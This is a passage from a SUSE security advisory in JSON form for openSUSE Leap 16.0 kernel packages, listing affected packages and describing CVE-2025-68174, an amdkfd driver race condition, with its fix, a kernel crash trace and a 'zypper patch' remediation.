"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
